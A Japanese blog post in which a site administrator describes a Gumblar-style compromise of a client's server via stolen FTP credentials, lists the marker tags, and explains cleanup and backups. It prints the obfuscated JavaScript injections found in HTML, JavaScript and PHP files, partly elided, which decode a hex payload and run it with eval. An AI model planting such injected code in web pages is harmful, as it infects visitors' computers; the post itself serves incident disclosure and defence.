WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

Windows 7 マルウエア Line 副業術 放射線 山下 サイト改ざん 登録禁止 explorer トレンドキーワード クリックランキング 短縮URL ランキング 蝶乃舞 プラグイン ソフト 株式会社ニュース 株式会社Free Agent Style ブロック ムーバブルタイプ ワードプレス 個人情報流出 Favicon 自己アフィリエイト アレックス式ネオせどりスクール 加藤 秀吉 アレックス ビジネス 株式会社SRシステム レタープレス 感染 Extension Manager ネットビジネス BBIZ Tiger-Wing Cash on Wordpress Wordpress Content Slide ハート ぼかし 三橋美仁 不労所得の神 久積篤史 ネットビジネス大全集 LinkShaker tool パズル 個人情報 到達率 バイマ ライブチャット PPC 音量アイコン ネットガレージ 滑らか スカイプ 百度 followmatic 復元 テンプレート アイコン 情報商材 HTML4.0 短縮URLツール XHTML アフィ匠 関根塾 android ネットビジネス最後の楽園 Google Maps API トラフィック バックアップ マニュアル 既得権益 ECサイト office RSS Includes Pages 株式会社SRシステム SmoothScroll.js 比較 改ざん 脆弱性 .htaccess Firefox ブロックポリシー インペリアルゴールド 大園麗花 WP ヤフー エディタ クラウド入力機能 フレンドシップメール 固定ページ レビュー 自動化 スムーズ 株式会社A-ブログレス エクスプローラー IBS ライン 宮田麗花 与沢翼×蝶乃舞 インターネットビジネススクール getElementByTagName getElementById 北川 雅嗣 掲示板 村上省吾 立体 株式会社バンザイ YouTube Maniax 2017 切抜き KMSpico ウイルス 球体 ファビコン 無料 FTP 原田真 ping BUYMA せどり postpost アンダーグラウンドメソッド 無料オファー 株式会社WINGOOD ネットゲーム 大園転売塾 wp-login.php アンダーグラウンドアフィリエイトクラブ 高速ゲーム MasterCollection 出店料 Login LockDown 関根義光 functions.php やしろ塾 スタイルシート ツール 自動 Google Maps JavaScript もざ 日本語入力変換ソフト 池田純矢 レンタルサーバー エキスパートメール Thunderbird 伊藤 虎太郎 モザイク High Concept Marketing ヤフオク コピーボタン やしろひろたみ セキュリティ IE RSS 大園式転売塾 wordpress 小笠原健一 改竄 デスクトップ ブラウザ 管理画面 SyntaxHighlighter 流出 伊藤虎太郎 アフィリエイト 与沢翼 シャンプー ライオンアフィリエイト アクセスアップ 無断送信 ソースコード ボタン クロスアフィリエイト 人物 RMT ブラクラ 上位表示 メルマガ配信システム 賢威 アドセンス 転売大園塾 ざくざく君 Internet Explorer Windows Chrome ドメイン Youtube document.all SEO ユーチューブマニアクス2017 中山秀人 バイドゥー ping送信 申請金ビジネス 秒速で1億円稼ぐ男 iphone 大西良幸 FireWorks Yahoo 詐欺 背景 ロリポップ インフォトップ クラウド変換 DTD DOCTYPE 表示 WEB CS5 テーマ マイクロソフト Adobe リンクシェイカー ツイッター 高額塾 system ネットショップ トレンドアフィリエイト 配布 CS6 インターネット 量産 MT EC 権利収入 81a338 レイアウト崩れ プロファイル グラデーション Ban Hammer カスタマイズ フォローマティック ウインドウ ヤフーショッピング プロモーション アクセス制限 自己アフィリ 定型文 詐欺組織 Baidu moza wpXサーバー 画像 クラック PHP スクロール force puzzle スマホ 切り抜き 土屋ひろし 伊藤 歩 CGI css html ネオヒルズアカデミー MovableTYpe インターネットエクスプローラー タイガーウイング 不正送信 伊藤塾 特権ビジネス ブラシ 石井匠 新井浩 メモ SKナレッジ 加工 @PAGES ブルートフォースアタック Diamond Affiliate Masters Program レイアウト twitter サンタ google 優先順位 Newpost Catch バナー エクスチェンジ タスクバー 管理ツール IP がら空きビジネス 不正アクセス 秀吉塾天下統一 ソース 特定のメールアドレス Agency Business KMS認証

アーカイブ

エステトラブル

このページの先頭へ